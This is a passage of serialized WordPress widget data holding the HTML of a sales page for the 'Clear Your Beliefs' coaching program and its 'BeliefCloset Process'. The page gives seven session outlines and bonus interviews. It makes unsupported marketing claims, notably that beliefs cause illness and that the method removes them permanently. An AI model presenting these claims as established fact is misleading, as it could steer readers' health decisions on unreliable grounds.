easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:61073:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div 